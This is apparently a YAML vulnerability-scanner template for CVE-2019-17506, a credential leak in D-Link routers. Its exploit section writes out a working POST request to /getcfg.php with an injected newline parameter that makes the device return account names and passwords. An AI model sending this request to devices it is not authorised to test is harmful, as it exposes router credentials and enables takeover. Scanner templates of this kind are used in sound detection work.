product: D-Link
vName: D-Link 账号密码泄露
type: 信息泄露
vID:
  - CVE-2019-17506
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://xz.aliyun.com/t/6453
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /getcfg.php
      header:
        Content-Type: application/x-www-form-urlencoded
      data: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <name>
              - <password>
            logic: and
          header:
            value:
              - Content-Type
              - xml
            logic: and